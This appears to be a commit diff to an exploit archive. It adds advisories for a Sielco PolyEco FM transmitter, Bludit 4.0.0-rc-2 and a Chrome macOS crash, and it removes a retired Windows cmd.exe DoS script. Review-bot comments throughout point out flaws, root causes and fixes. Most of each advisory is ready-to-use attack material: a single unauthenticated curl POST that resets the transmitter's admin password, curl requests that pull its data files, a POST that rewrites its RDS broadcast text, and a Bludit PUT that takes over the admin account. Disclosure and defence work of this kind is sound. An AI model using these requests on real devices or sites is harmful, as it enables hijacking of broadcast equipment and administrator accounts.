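Review bot: `if not 'http' in url` tests only for the substring, so a bare hostname that happens to contain "http" passes the check and never gets the `http://` prefix; use `url.startswith(('http://', 'https://'))` and write `not in` rather than `not ... in`. The success test `r.status_code == 200` does not confirm that the password was changed, because a device can answer 200 with an error page; inspect the response body. `requests.post` is called without a `timeout`, so the script hangs on an unreachable host, and `exit()` should be `sys.exit()` outside an interactive session. The banner is a normal (non-raw) triple-quoted string containing `\ ` and `\_`, which are invalid escape sequences and raise a DeprecationWarning (SyntaxWarning from Python 3.12); make it a raw string. On the product side the description makes the finding clear: `/protect/users.htm` accepts `pwd_admin`/`pwd_user` with no session at all, so the fix is to require an authenticated admin session on that handler.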


@ -0,0 +1,88 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5768
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php
26.01.2023
--
index.htm:
----------
54: function dologin() {
55: var hash = hex_md5($('#password').val() + id);
56: $.get('/login.cgi', {
57: user: $('#user').val(),
58: password: hash,
59: id: id
60: }).done(function (data) {
61: var dati = $.parseXML(data);
62: id = $(dati).find('id').text();
63: user = $(dati).find('u').text();
64: if (id == 0)
65: window.location.href = '/index.htm';
66: else {
67: scriviCookie('polyeco', id, 180);
68: if (user >= 3)
69: window.location.href = '/protect/factory.htm';
70: else
71: window.location.href = '/protect/index.htm';
72: }
73: });
74: }
The function 'dologin()' in index.htm is called when a user submits a login form.
It starts by calculating a hash of the user-entered password and a variable 'id'
using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'
endpoint with the user's entered username, the calculated password hash and the
'id' variable as parameters. If the request is successful, the function parses the
XML data returned from the server, extracting the values of the 'id' and 'u' elements.
Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects
the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the
value of 'id' and expires after 180 days.
After that it checks the value of the 'user' variable, if it's greater than or equal
to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the
user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side
JavaScript to always set the 'user' variable to a high value (4), or by tampering with
the data sent to the server during the login process to change the value of the 'user'
variable. It also works if the server's response variable 'user' is modified.
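Review bot: the explanation of line 67 says the `polyeco` cookie "expires after 180 days", but `scriviCookie` is not shown, so the unit of its third argument is an assumption and should be marked as one. More importantly, the write-up stops at the client-side redirect: changing `user` in the browser only changes which page the browser navigates to, so the advisory needs to show that `/protect/factory.htm` is actually served, and its actions accepted, for a session whose server-side role is below 3; without that it is a UI quirk rather than an authorization bypass. The threshold is `user >= 3`, so the quoted value "4" is not required and "3" already meets it. Also say where the initial `id` comes from, since it is mixed into `hex_md5(password + id)` on line 55, sent as a parameter on line 59, and then replaced by the server's value on line 62. The fix is to enforce the role check on the server for every `/protect/` resource rather than in `dologin()`.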


@ -0,0 +1,118 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages. The application interface allows
users to perform certain actions via HTTP requests without performing
any validity checks to verify the requests. This can be exploited
to perform certain actions and manipulate the RDS text display.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5767
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
26.01.2023
--
POST /protect/rds.htm HTTP/1.1
Host: RADIOFM
rds_inta=1
rds_intb=0
rds_pi=381
rds_ps=ZSL
rds_rta=www.zeroscience.mk
rds_rtb
rds_rtt=0
rds_tp=0
rds_tp=1
rds_ta=0
rds_ms=0
rds_pty=4
rds_ptyn=
rds_ecc=00
rds_ct=0
rds_level=90
rds_psd=0
rds_psd1
rds_pst1=0
rds_psd5
rds_pst5=0
rds_psd2
rds_pst2=0
rds_psd6
rds_pst6=0
rds_psd3
rds_pst3=0
rds_psd7
rds_pst7=0
rds_psd4
rds_pst4=0
rds_psd8
rds_pst8=0
rds_di_pty=0
rds_di_cmp=0
rds_di_cmp=1
rds_di_st=0
rds_di_art=0
rds_di_art=1
a0=90
a1=9
a2=26
a3=115
a4=0
a5=0
a6=0
a7=0
a8=0
a9=0
a10=0
a11=0
a12=0
a13=0
a14=0
a15=0
a16=0
a17=0
a18=0
a19=0
a20=0
a21=0
a22=0
a23=0
a24=0
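Review bot: the PoC request lacks `Content-Type: application/x-www-form-urlencoded`, `Content-Length` and the blank line between headers and body, and it lists several parameters twice (`rds_tp=0` then `rds_tp=1`, `rds_di_cmp=0`/`rds_di_cmp=1`, `rds_di_art=0`/`rds_di_art=1`), so it is unclear whether the body is a verbatim capture of a hidden-input-plus-checkbox form or a pasted template; add the headers and state which value the lwIP handler takes when a parameter repeats. The description frames the issue as direct object access, but the request as shown carries no Cookie or session token at all, so the more precise root cause is that the `/protect/rds.htm` POST handler applies neither authentication nor an anti-CSRF token. The fix is to gate every state-changing handler under `/protect/` on a validated session and an origin-bound token; a defender can detect abuse by logging POSTs to `/protect/*.htm` that arrive without a valid session cookie.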


@ -0,0 +1,67 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Sielco PolyEco is affected by an information disclosure
vulnerability due to improper access control enforcement. An
unauthenticated remote attacker can exploit this, via a specially
crafted request to gain access to sensitive information.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
26.01.2023
--
$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi
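Review bot: the list of `.ssi` endpoints is not backed by any output sample, so the "sensitive information" claim in the description cannot be verified from the file; include a redacted excerpt of at least one response (what `smtp.ssi` or `lan.ssi` returns, for example) so that readers and the vendor can judge severity. The root cause is worth stating explicitly: the device keeps its management pages under `/protect/` (compare the `/protect/rds.htm` and `/protect/users.htm` requests in the sibling files of this commit) while the data files those pages read are served from the web root with no access check, so the fix is to place the `.ssi` files behind the same authentication as `/protect/`, and a defender can watch for unauthenticated GETs of `*.ssi` from hosts outside the management network.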


@ -0,0 +1,54 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: The application suffers from an authentication bypass,
account takeover/lockout and elevation of privileges vulnerability
that can be triggered by directly calling the users object and
effectively modifying the password of the two constants user/role
(user/admin). This can be exploited by an unauthenticated adversary
by issuing a single POST request to the vulnerable endpoint and
gain unauthorized access to the affected device with administrative
privileges.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5765
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
26.01.2023
--
# Change admin pwd
$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
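Review bot: the description claims three outcomes (authentication bypass, account takeover/lockout, elevation of privileges) but the single curl line demonstrates only one of them; say explicitly that the empty `pwd_user=` field is what locks the `user` account out, and show the follow-up login with `t00t` that proves the admin takeover, otherwise the lockout and EoP claims rest on the reader's inference. The request is sent with `-F` (multipart/form-data) and no cookie, which is the evidence for the "unauthenticated" claim and should be called out as the key observation. Remediation should be spelled out for the vendor: `/protect/users.htm` must require a valid session with the admin role and the current password before accepting `pwd_admin`/`pwd_user`, and must reject empty passwords; on the monitoring side, an admin password change with no preceding successful login on the same session is the event to alert on.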


@ -0,0 +1,319 @@
## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
110.0.5481.100 (Official Build) (x86_64)
108.0.5359.124 (Official Build) (x86_64)
108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <iostream>
#include <sstream>
#include <vector>
__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS
std::ostream& bold_on(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[1m";
}
return os;
}
std::ostream& bold_off(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[0m";
}
return os;
}
std::string from_cfstr(CFTypeRef cf_ref)
{
if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
{
const auto cf_str = static_cast<CFStringRef>(cf_ref);
const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
auto result = std::string(max_length, '\0');
if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
{
if (const auto pos = result.find('\0'); pos != std::string::npos)
{
result.resize(pos);
}
return result;
}
}
return {};
}
std::string ax_element_id(AXUIElementRef value)
{
// AX element cache - AX elements are backed by CFData
// (referring to 'remote' AX objects) and this data is
// 'stable' across 'volatile' instances of AXUIElement.
// 'hash and equality' of AX elements are based on this
// data and therefore, we can use AXUIElement objects as
// 'keys' in a dictionary with values, identifying these
// objects (uniquely).
const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
auto ax_id = CFDictionaryGetValue(ax_elements, value);
if (ax_id == nullptr)
{
if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
{
if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
{
CFDictionarySetValue(ax_elements, value, uuid_s);
CFRelease(uuid_s);
}
CFRelease(uuid);
}
ax_id = CFDictionaryGetValue(ax_elements, value);
}
return from_cfstr(ax_id);
}
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
if (e != nullptr)
{
auto ref = T{};
if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
{
return ref;
}
}
return nullptr;
}
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
const auto max_depth = 10;
if (depth > max_depth)
{
return;
}
const auto indent = [&]()
{
for (auto x = 0; x < depth; x++)
{
std::cout << " ";
}
};
auto wid = CGWindowID{};
if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
{
wid = 0;
}
indent();
const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
std::endl;
if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
{
for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
{
const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
ax_traverse(element, depth + 1);
}
CFRelease(children);
}
}
int main(int argc, char* const argv[])
{
auto pid = 0;
if (argc > 1)
{
if (!AXIsProcessTrusted())
{
std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
exit(1); // NOLINT
}
// NOLINTNEXTLINE
pid = std::stoi(argv[1]);
}
else
{
std::cerr << "usage: axtester <pid>" << std::endl;
exit(1); // NOLINT
}
if (const auto app = AXUIElementCreateApplication(pid))
{
auto observer = AXObserverRef{};
auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
{
auto myapp = (__AXUIElement*)(ctx);
auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
std::cout << "Hint: " << hint << std::endl;
ax_traverse(myapp, 0);
}, &observer);
if (kAXErrorSuccess != ret)
{
std::cerr << "Fail to create observer" << std::endl;
return -1;
}
std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
CFRunLoopRun();
}
return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The ax_traverse() function is then called with the root accessibility
element of the application as an argument. This function recursively
traverses the accessibility tree of the application, printing out
information about each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--
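Review bot: the axtester.mm PoC has three defects a reader who builds it will hit. `isatty` and `STDOUT_FILENO` are used in `bold_on`/`bold_off` without `#include <unistd.h>`, and `"\e[1m"` is a compiler extension, so portable code should spell it `"\x1b[1m"`. In the observer callback, `CFStringGetCStringPtr(name, kCFStringEncodingUTF8)` may legitimately return NULL, and streaming a null `char*` into `std::cout` is undefined behaviour; fall back to `from_cfstr(name)`, which already does the safe copy. `ax_traverse` never releases the `role` value returned by `ax_attribute_value<CFTypeRef>` even though `AXUIElementCopyAttributeValue` transfers ownership to the caller (the `children` array is released correctly later in the same function), so every visited node leaks a CFString, which matters in a PoC that re-walks the whole tree on every notification. Separately, the advisory itself quotes Google's response that this "is not a security issue nor results in security consequences"; the header should say plainly that this is an availability bug with a local, user-initiated trigger so the classification is not overstated.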


@ -0,0 +1,90 @@
## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
## Author: nu11secur1ty
## Date: 04.11.2013
## Vendor: https://www.bludit.com/
## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
## Description:
The already authenticated attacker can send a normal request to change
his password and then he can use
the same JSON `object` and the vulnerable `API token KEY` in the same
request to change the admin account password.
Then he can access the admin account and he can do very malicious stuff.
STATUS: HIGH Vulnerability
[+]Exploit:
```PUT
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close
{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: *
Content-Type: application/json
{"status":"0","message":"User edited.","data":{"key":"admin"}}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
## Proof and Exploit:
[href](https://streamable.com/w3aa4d)
## Time spend:
00:57:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
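Review bot: the header date `04.11.2013` contradicts the `Date: Tue, 11 Apr 2023` header in the captured response and should read 2023. The write-up never states the root cause; from the request it is visible that the path targets `/api/users/admin`, the JSON body carries `"username":"pwned"` together with a `token` and an `authentication` value, the Referer is the attacker's own `/admin/edit-user/pwned` page, and the response reports `"key":"admin"`, so the point to make explicit is that the API edits whichever user is named in the URL once any authenticated user's token/authentication pair is supplied, without checking that the caller is that user or an administrator. The fix on the Bludit side is an ownership-or-admin check in the PUT handler for `/api/users/<username>`, and the `authentication` value should not be accepted across accounts; a defender can alert on `PUT /api/users/<name>` where the session's user differs from `<name>`. Finally, the two copies of the e-mail signature at the end of the file (including the opaque `hiPEn...` line) are mail client residue and should be dropped from the advisory.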


@ -1,38 +0,0 @@
# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Date: 2023-03-30
# Vendor Homepage: https://www.microsoft.com/en-us
# Software Link: https://www.microsoft.com/en-us
# Tested Version: N/A
# Tested on OS: Windows 11 Pro
# [ About App ]
Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
This issue affects Microsoft Windows 11 Pro.
Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
# [ POC ]
# 1.Run the python script, it will create a new file "PoC.txt"
# 2.Run Command Prompt
# 3.Copy the content of the file "PoC.txt"
# 4.Paste the content of dos.txt into the lin cmd.exe
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "A" * 339839907
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
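Review bot: the removal is consistent with the file's own text, which states "Further analysis reveals that this is not a vulnerability; this BID is now retired", and with the matching deletion of the 51348 entry from the exploits CSV further down in this commit. For the record, the deleted PoC only writes 339,839,907 'A' characters (about 340 MB) to a file for the user to paste into a console window, which is resource exhaustion of a local, user-driven action rather than the bounds-check failure the "About App" paragraph claims; the script is also Python 2 (`print` statements) and catches every exception with a bare `except:`, which would have hidden the real error if the file could not be written.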


@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info
28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info
11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,,
51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,,
29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info
29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info
30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info
@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
